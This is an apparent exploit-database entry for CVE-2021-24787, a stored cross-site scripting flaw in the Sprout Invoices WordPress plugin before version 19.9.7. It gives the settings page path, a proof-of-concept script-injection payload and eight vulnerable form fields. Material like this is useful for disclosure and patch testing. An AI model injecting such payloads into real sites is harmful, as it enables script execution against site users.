Exploit for Client Invoicing by Sprout Invoices < 19.9.7 - Admin+ Stored Cross-Site Scripting CVE-2021-24787

Name: Exploit for Client Invoicing by Sprout Invoices < 19.9.7 - Admin+ Stored Cross-Site Scripting CVE-2021-24787
Rating: 5 (238 reviews)

2021-10-18 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:C89BF498-F384-49DE-820E-6CBD70390DB2
Put the following payload in one of the vulnerable fields in the General Settings of the plugin (/wp-admin/admin.php?page=sprout-invoices-settings): "><script>alert(/XSS/)</script>

Vulnerable fields:
1. Company Name
2. Contact Email
3. Phone
4. Fax
5. First Name
6. Last Name
7. City
8. Zip code